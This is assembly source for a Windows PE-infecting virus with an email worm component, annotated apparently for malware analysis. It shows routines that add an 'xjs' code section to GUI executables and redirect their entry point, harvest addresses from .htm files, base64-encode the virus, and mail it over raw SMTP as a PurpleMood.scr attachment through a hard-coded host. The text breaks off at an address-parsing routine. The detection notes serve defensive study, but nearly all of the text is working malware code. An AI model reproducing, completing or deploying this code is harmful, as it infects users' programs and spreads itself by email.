;感染PE文件
;-----------------------------------------------------------------------
; InfectFile(FileName) -- PE file infector, annotated for analysis
; Convention: MASM PROC with one DWORD argument, callee cleans (ret 4)
; In:    FileName = path of the candidate host file
;        ebx      = relocation delta used for every data reference
;                   ([label+ebx]); set by the caller, outside this view
; Out:   nothing usable -- pushad/popad restores eax, so the caller
;        cannot tell whether the file was modified
; Locals: hFile, hMapping, pMapping, ByteWrite (DWORDs)
; The `mov eax,12345678h` / `_X = dword ptr $-4` pairs give a name to
; the imm32 operand of the mov so it can be overwritten with a real
; API address (MailInit does exactly that for _socket/_connect/_send);
; whoever patches _CreateFile.._UnmapViewOfFile is outside this view.
; Artifacts an infected file carries (useful for detection/triage):
;   - a new last section named 'xjs'
;   - that section's Characteristics = 0E0000020h (code|exec|read|write)
;   - OptionalHeader Major/MinorLinkerVersion = 15h/08h (word 0815h at
;     NT-header offset 1Ah), used as the "already infected" marker
;   - AddressOfEntryPoint redirected to the new section's VirtualAddress
;-----------------------------------------------------------------------
InfectFile PROC FileName : DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
LOCAL ByteWrite: DWORD
pushad ;all registers preserved, so no return value survives
;CreateFile(FileName, GENERIC_READ|GENERIC_WRITE,
;           FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
;           FILE_ATTRIBUTE_NORMAL, NULL) -- arguments pushed right-to-left
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push FileName
mov eax , 12345678h
_CreateFile = dword ptr $-4 ;name for the imm32 above (patch slot)
call eax
cmp eax,INVALID_HANDLE_VALUE
jz IF_Exit ;nothing to release yet
mov hFile,eax
;CreateFileMapping(hFile, NULL, PAGE_READWRITE, 0, 0, NULL):
;size 0/0 = whole file, unnamed; read/write so header edits reach the file
push 0
push 0
push 0
push PAGE_READWRITE
push NULL
push hFile
mov eax , 12345678h
_CreateFileMapping = dword ptr $-4
call eax
or eax,eax
jz IF_F3 ;only hFile to close
mov hMapping , eax
;MapViewOfFile(hMapping, FILE_MAP_READ|FILE_MAP_WRITE, 0, 0, 0): map the whole file
push 0
push 0
push 0
push FILE_MAP_READ+FILE_MAP_WRITE
push hMapping
mov eax , 12345678h
_MapViewOfFile = dword ptr $-4
call eax
or eax,eax
jz IF_F2 ;hMapping and hFile to close
mov pMapping,eax
mov esi,eax
assume esi :ptr IMAGE_DOS_HEADER
;---- host selection: every failed .IF below skips to IF_F1 ----
.IF [esi].e_magic!=IMAGE_DOS_SIGNATURE ;'MZ' check
jmp IF_F1
.ENDIF
.IF [esi].e_lfarlc!=040h ;reloc-table offset must be 40h (the usual DOS-stub value)
jmp IF_F1
.ENDIF
add esi,[esi].e_lfanew ;esi now points at the NT headers (the original note said edx)
assume esi:ptr IMAGE_NT_HEADERS
.IF [esi].Signature!=IMAGE_NT_SIGNATURE ;'PE\0\0' -- is it a PE file?
jmp IF_F1
.ENDIF
.IF word ptr [esi].OptionalHeader.Subsystem!=2 ;2 = IMAGE_SUBSYSTEM_WINDOWS_GUI: only GUI programs are touched
jmp IF_F1
.ENDIF
.IF word ptr [esi+1ah]==0815h ;infection marker already present (see header comment): skip
jmp IF_F1
.ENDIF
mov eax,[esi].OptionalHeader.AddressOfEntryPoint
add eax,[esi].OptionalHeader.ImageBase
mov HostEntry[ebx],eax ;save the original entry point as a VA (ImageBase+RVA)
;***************************************************************
;Check whether the headers have room for one more section header.
;28h = sizeof IMAGE_SECTION_HEADER
;18h = sizeof IMAGE_FILE_HEADER + Signature
;edi will point at the slot for the new section header.
;***************************************************************
movzx eax,[esi].FileHeader.NumberOfSections
mov ecx,28h
mul ecx ;eax = NumberOfSections*28h; edx becomes 0 (the div below depends on that)
lea edi,[esi]
sub edi,pMapping ;edi = file offset of the NT headers (e_lfanew)
add eax,edi
add eax,18h
movzx edi,[esi].FileHeader.SizeOfOptionalHeader
add eax,edi ;eax = file offset just past the last existing section header
mov edi,eax
add edi,pMapping ;I forgot this first -- edi = mapped address of that slot
add eax,28h ;the end of the new header must still lie inside SizeOfHeaders
.IF eax>[esi].OptionalHeader.SizeOfHeaders
jmp IF_F1 ;no room; nothing has been modified yet
.ENDIF
;*****************************************
;Room available: insert the new section header and fill its fields.
;[edi-28h] is the last existing section header; its raw-data fields
;are reused below to place the new section's raw data.
;*****************************************
inc [esi].FileHeader.NumberOfSections ;first write into the mapped headers
assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr[edi],00736A78h ;'xjs' -- section Name "xjs\0" in little-endian; detection artifact
push [esi].OptionalHeader.SizeOfImage
pop [edi].VirtualAddress ;new section starts where the image currently ends
mov eax,offset VEnd-offset VStart
mov [edi].Misc.VirtualSize,eax ;VirtualSize = size of the code between VStart and VEnd
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx ;edx:eax / FileAlignment (edx still 0 from the mul above)
inc eax ;always rounds up by one full unit, even when already aligned
mul ecx
mov [edi].SizeOfRawData,eax ;SizeOfRawData = (VirtualSize/FileAlignment+1)*FileAlignment
lea eax,[edi-28h+14h] ;PointerToRawData of the previous (last) section
mov eax,[eax]
lea ecx,[edi-28h+10h] ;SizeOfRawData of the previous (last) section
mov ecx,[ecx]
add eax,ecx
mov [edi].PointerToRawData,eax ;new raw data follows the last section's raw data (presumably the end of file)
mov [edi].Characteristics,0E0000020h ;IMAGE_SCN_CNT_CODE|MEM_EXECUTE|MEM_READ|MEM_WRITE
;***************************************************************
;Update SizeOfImage and AddressOfEntryPoint so the new section is
;mapped by the loader and runs before the host.
;***************************************************************
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx ;edx is 0 from the mul above (assuming no 32-bit overflow there)
inc eax ;rounds up by one full unit, as for SizeOfRawData
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax
mov eax,[edi].VirtualAddress
mov [esi].OptionalHeader.AddressOfEntryPoint,eax ;entry point now lands in the new section
mov word ptr [esi+1ah],0815h ;write the infection marker (MajorLinkerVersion=15h, MinorLinkerVersion=08h)
;SetFilePointer(hFile, PointerToRawData, NULL, FILE_BEGIN)
push FILE_BEGIN
push 0
push [edi].PointerToRawData
push hFile
mov eax , 12345678h
_SetFilePointer = dword ptr $-4
call eax
;****************************************************************
;With the file pointer at the new raw-data offset, write the code
;starting at VStart; the length is the file-aligned SizeOfRawData.
;Note: SizeOfRawData exceeds VEnd-VStart, so whatever follows VEnd in
;memory is written too (part of the on-disk artifact).
;****************************************************************
;WriteFile(hFile, VStart+ebx, SizeOfRawData, &ByteWrite, NULL)
push 0
lea eax,ByteWrite
push eax
push [edi].SizeOfRawData
lea eax,[offset VStart+ebx]
push eax
push hFile
mov eax , 12345678h
_WriteFile = dword ptr $-4
call eax ;return value not checked
;---- cleanup cascade; each label releases one more resource ----
IF_F1:
push pMapping
mov eax , 12345678h
_UnmapViewOfFile = dword ptr $-4
call eax ;header edits made through the writable view are written back by the system
IF_F2:
push hMapping
call _CloseHandle[ebx] ;CloseHandle goes through a delta-addressed pointer, not a patch slot
IF_F3:
push hFile
call _CloseHandle[ebx]
IF_Exit:
popad
ret 4 ;stdcall-style: discard the FileName argument
InfectFile ENDP
;*****************电子邮件传播线程***************************
;从本地、网络的*.htm*获得邮件地址.
;***********************************************************
;-----------------------------------------------------------------------
; MailThread -- body of the e-mail spreading loop. Not a PROC: it is
; entered as a thread start/jump target and never returns.
; Flow: MailInit once, then forever: EnumDisk(FILE_HTM, 'c:'), Sleep(24h).
; EnumDisk, FILE_HTM and the @pushsz macro are defined outside this
; view; @pushsz presumably pushes the address of its inline string.
;-----------------------------------------------------------------------
MailThread:
call MailInit ;build the base64 attachment and resolve WSOCK32 once
MT_Work:
push FILE_HTM ;file-type selector for EnumDisk (per the header above: *.htm*)
@pushsz 'c:' ;only drive C: is passed here
call EnumDisk ;presumably walks the drive and harvests addresses -- TODO confirm
push 1000*60*60*24 ;sleep a day :) -- 86,400,000 ms between sweeps
call _Sleep[ebx]
jmp short MT_Work ;loops forever
;*********************************************************
;Mutate virus to BASE64 only once
;*********************************************************
;-----------------------------------------------------------------------
; MailInit -- one-time setup for the mail thread:
;   1. map the file at szFilePath read-only and base64-encode
;      SIZEOF_VIRUS_FILE bytes of it into a VirtualAlloc'd buffer whose
;      address is kept in Base64_Encoded_Data
;   2. load WSOCK32.DLL, call WSAStartup(2.2), resolve socket/
;      gethostbyname/connect/send/closesocket and store the addresses
;      into SendMail's patch slots (_socket, _connect, _send, _closecsoket)
;   3. resolve the hard-coded host pact518.hit.edu.cn into ServIP
; In:    ebx = relocation delta for data references
; Out:   none (pushad/popad); the globals above are the side effects
; None of the handles/pointers obtained below is checked before use.
; Network artifact: a DNS lookup of pact518.hit.edu.cn at start-up.
;-----------------------------------------------------------------------
MailInit PROC
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
pushad
xor edi,edi ;edi = 0, reused as NULL for the pushes below
;CreateFile(szFilePath+ebx, GENERIC_READ, FILE_SHARE_READ, NULL,
;           OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)
push edi
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push edi
push FILE_SHARE_READ
push GENERIC_READ
lea eax,[offset szFilePath+ebx]
push eax
call _CreateFile[ebx]
mov hFile,eax ;not compared with INVALID_HANDLE_VALUE
;CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL)
push edi
push edi
push edi
push PAGE_READONLY
push edi
push eax
call _CreateFileMapping[ebx]
mov hMapping,eax
;MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0) -- whole file, read-only
push edi
push edi
push edi
push FILE_MAP_READ
push eax
call _MapViewOfFile[ebx]
mov pMapping,eax
;VirtualAlloc(NULL, SIZEOF_VIRUS_FILE*2, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE)
;2x the input leaves room for base64 expansion (4/3) plus line ends;
;committed pages are zero-initialized, which is what later gives
;SendMail's lstrlen a terminator (EncodeBase64 writes no NUL)
push PAGE_READWRITE
push MEM_RESERVE or MEM_COMMIT
push SIZEOF_VIRUS_FILE*2
push edi
call _VirtualAlloc[ebx]
mov Base64_Encoded_Data[ebx],eax
mov esi,pMapping ;esi = source bytes (mapped file)
mov edi,Base64_Encoded_Data[ebx] ;edi = destination buffer
call EncodeBase64
;---- Winsock bootstrap via LoadLibrary/GetProcAddress (nothing in the import table) ----
@pushsz 'WSOCK32.DLL'
call _LoadLibraryA[ebx]
xchg eax,edi ;hSockDll -- edi now holds the module handle
@pushsz 'WSAStartup'
push edi
call _GetProcAddress[ebx]
lea esi,[offset WSA_Data+ebx]
push esi
push 0202h ;!!!warning 2.2 -- requested Winsock version 2.2
call eax ;WSAStartup(0202h, &WSA_Data); result ignored
@pushsz 'socket'
push edi
call _GetProcAddress[ebx]
mov [offset _socket+ebx],eax ;store into the imm32 patch slot inside SendMail
@pushsz 'gethostbyname'
push edi
call _GetProcAddress[ebx]
@pushsz 'pact518.hit.edu.cn' ;hard-coded mail host (DNS artifact)
call eax ;gethostbyname -> hostent*
mov esi,[eax+12] ;hostent+12 = h_addr_list in the 32-bit layout
lodsd ;eax = h_addr_list[0], pointer to the first in_addr
push [eax]
pop [offset ServIP + ebx] ;ServIP lives inside SendMail's inline sockaddr_in
@pushsz 'connect'
push edi
call _GetProcAddress[ebx]
mov [offset _connect+ebx],eax
@pushsz 'send'
push edi
call _GetProcAddress[ebx]
mov [offset _send+ebx],eax
@pushsz 'closesocket'
push edi
call _GetProcAddress[ebx]
mov [offset _closecsoket+ebx],eax ;slot name is misspelled but matches SendMail
;---- cleanup; the labels are fall-through only (nothing jumps to them) ----
MI_Close3:
push pMapping
call _UnmapViewOfFile[ebx]
MI_Close2:
push hMapping
call _CloseHandle[ebx]
MI_Close:
push hFile
call _CloseHandle[ebx]
MI_Exit:
popad
ret ;MASM emits the LOCAL frame epilogue here
MailInit ENDP
;**********************************
;esi <- Buffer with data to encode
;edi <- Destination buffer
;**********************************
;**********************************
;EncodeBase64 -- base64-encode SIZEOF_VIRUS_FILE bytes.
;In:   esi = source buffer, edi = destination buffer, ebx = delta
;Out:  edi advanced past the last byte written; eax/ecx/edx clobbered
;Alphabet: Base64DecodeTable -- despite the name it is indexed by a
;6-bit value, so presumably it holds the 64-character encode alphabet.
;Output shape: 4 chars per 3 input bytes, '=' padding, CRLF at the end.
;The "CRLF after every 19 groups" (76 columns) code is reached only
;from the two-pad branch of the final group (see BASE64__02), so in
;the normal path the output is a single line ended by one CRLF.
;**********************************
EncodeBase64 Proc
LOCAL BASE64_lines : DWORD
xor ecx,ecx ;ecx = input index
mov BASE64_lines,ecx
cld ;stosb/stosw advance edi
BASE64encode_loop:
cmp ecx,SIZEOF_VIRUS_FILE
jae BASE64__exit
xor edx,edx
mov dh,byte ptr [esi+ecx] ;byte 0 -> bits 15..8 of edx
inc ecx
cmp ecx,SIZEOF_VIRUS_FILE
jae BASE64__00 ;past the end: byte 1 stays 0
mov dl,byte ptr [esi+ecx] ;byte 1 -> bits 7..0
BASE64__00:
inc ecx
shl edx,08h ;edx = byte0<<16 | byte1<<8
cmp ecx,SIZEOF_VIRUS_FILE
jae BASE64__01 ;past the end: byte 2 stays 0
mov dl,byte ptr [esi+ecx] ;byte 2 -> bits 7..0
BASE64__01:
inc ecx ;ecx = start+3; overshoots SIZEOF_VIRUS_FILE by 1 or 2 on a short last group
;emit the four 6-bit groups, high to low
mov eax,edx
and eax,00fc0000h
shr eax,12h ;bits 23..18
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
mov eax,edx
and eax,0003f000h
shr eax,0Ch ;bits 17..12
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
mov eax,edx
and eax,00000fc0h
shr eax,06h ;bits 11..6
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
mov eax,edx
and eax,0000003fh ;bits 5..0
mov al,byte ptr [eax+offset Base64DecodeTable+ebx]
stosb
;padding: overshoot of 1 -> one '=', overshoot of 2 -> two '='
cmp ecx,SIZEOF_VIRUS_FILE
jbe BASE64__02 ;no overshoot: no padding
mov byte ptr [edi-00000001h],'=' ;replace the 4th character
BASE64__02:
cmp ecx,SIZEOF_VIRUS_FILE+01h
jbe BASE64__03 ;overshoot <= 1: skips the whole block below, line counter included
mov byte ptr [edi-00000002h],'=' ;replace the 3rd character as well
inc BASE64_lines ;only executed in the overshoot-by-2 case (see header comment)
cmp BASE64_lines,00000013h ;19 groups = 76 characters per line
jne BASE64encode_loop
mov ax,0A0Dh ;CRLF (0Dh,0Ah in memory)
stosw
mov BASE64_lines,00000000h
BASE64__03:
jmp BASE64encode_loop
BASE64__exit:
mov ax,0A0Dh ;terminating CRLF
stosw ;no NUL is written; the caller's lstrlen relies on a zeroed buffer
ret
EncodeBase64 EndP
;**********************************************
;发送邮件函数
;1. 连接SMTP Server
;2. 发送协议信息,发送BASE64编码的附件,发送其余数据
;warning: 发送数据的长度
;**********************************************
;**********************************************
;SendMail -- deliver one message over raw SMTP to ServIP, port 25.
;In:   ebx = delta; VSocket/ServIP/TempMailTo/Base64_Encoded_Data and
;      the _socket/_connect/_send/_closecsoket slots are filled by
;      MailInit or by code outside this view
;Out:  none (pushad/popad); opens, uses and closes one TCP socket
;Sequence: socket -> connect -> send HELO + "MAIL FROM: <" + TempMailTo
;-> send ">" + RCPT TO -> send DATA + MIME headers -> send the base64
;body -> send closing boundary, "." and QUIT -> closesocket.
;Server replies are never read (there is no recv in this routine).
;Inline buffers are passed with `call LABEL_END`: the pushed return
;address becomes the buffer argument and execution resumes at LABEL_END.
;Mail artifacts visible here (for mail-filter / IDS signatures):
;  HELO cx; RCPT TO: <test@pact518.hit.edu.cn>; Subject:hi;
;  boundary WC_MAIL_PaRt_BoUnDaRy_05151998; attachment PurpleMood.scr
;**********************************************
SendMail PROC
pushad
;socket(AF_INET, SOCK_STREAM, 0)
push NULL
push SOCK_STREAM
push AF_INET
mov eax , 12345678h
_socket = dword ptr $-4 ;patched by MailInit
call eax
mov VSocket[ebx],eax ;not checked for INVALID_SOCKET
push sizeof(sockaddr) ; Size of connect structure=16
call @SMTP1 ; Connect structure -- pushes the address of the sockaddr_in below
dw AF_INET ; Family
db 0,25 ; Port number,avoid htons :) -- big-endian 0019h = port 25
ServIP dd 0 ; in_addr of server -- filled by MailInit from gethostbyname
db 8 dup(0) ; Unused
@SMTP1:
push [offset VSocket+ebx]
mov eax , 12345678h
_connect = dword ptr $-4
call eax ;connect(VSocket, &sockaddr_in, 16); result ignored
;first write: lstrlen(SM_I) covers 'HELO cx\r\nMAIL FROM: <' plus the
;NUL-terminated TempMailTo, which is zero-filled here and presumably
;filled in by the address harvester -- TODO confirm
lea eax,[offset SM_I+ebx]
push eax
mov eax,12345678h
_lstrlen = dword ptr $ - 4
call eax
push NULL
push eax
call SM_I_End ;pushes &SM_I as the buffer argument
SM_I:
HelloServer db 'HELO cx',0dh,0ah
db 'MAIL FROM: <'
TempMailTo db 128 dup (0)
SM_I_End:
push [offset VSocket+ebx]
call _send[ebx] ;send(VSocket, SM_I, len, 0)
push NULL
push SM_II_End - SM_II
call SM_II_End
SM_II:
db '>',0dh,0ah
RcptTo db 'RCPT TO: <test@pact518.hit.edu.cn>',0dh,0ah ;fixed recipient
SM_II_End:
push [offset VSocket+ebx]
call _send[ebx]
push NULL
push SM_Data_Len
call SM_Data
;NOTE(review): three of the db lines below (Content-Type, octet-stream,
;Content-Disposition) are wrapped mid-string by the page extraction;
;they are left exactly as found.
MailData db 'DATA',0dh,0ah
db 'Subject:hi',0dh,0ah
db 'Content-Type: multipart/mixed;boundary=WC_MAIL_PaRt_BoUnDaR
y_05151998',0dh,0ah
db '--WC_MAIL_PaRt_BoUnDaRy_05151998',0dh,0ah
db 'Content-Type: application/octet-stream; file=PurpleMood.scr',0dh,0
ah
db 'Content-Transfer-Encoding: base64',0dh,0ah
db 'Content-Disposition: attachment; filename=PurpleMood.scr',0
dh,0ah,0dh,0ah
SM_Data_Len = $ - MailData
SM_Data:
push [offset VSocket+ebx]
call _send[ebx] ;send(VSocket, MailData, SM_Data_Len, 0): DATA command and MIME headers in one write
mov eax,Base64_Encoded_Data[ebx]
push eax
call _lstrlen[ebx] ;length of the base64 body (depends on the zero-filled tail of the buffer)
push NULL ;Send base64 attachment
push eax ;SIZEOF_VIRUS_BASE64
push [offset Base64_Encoded_Data+ebx] ; Buffer
push [offset VSocket+ebx]
call _send[ebx]
push NULL
push SM_DR_Len
call SM_DR
MailDataRemain db '--WC_MAIL_PaRt_BoUnDaRy_05151998--',0dh,0ah
db 0dh,0ah,'.',0dh,0ah,'QUIT',0dh,0ah ;end of DATA ("." on its own line) followed by QUIT
SM_DR_Len = $ - MailDataRemain
SM_DR:
push [offset VSocket+ebx]
call _send[ebx]
push [offset VSocket+ebx]
mov eax , 12345678h
_closecsoket = dword ptr $-4 ;patched by MailInit (misspelled name matches there)
call eax ;closesocket(VSocket)
popad
ret
SendMail ENDP
;分析MailFileName(*.htm*),寻找Mail_Addr.
Parse_HTM PROC FileName :DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL SafeFSize: DWORD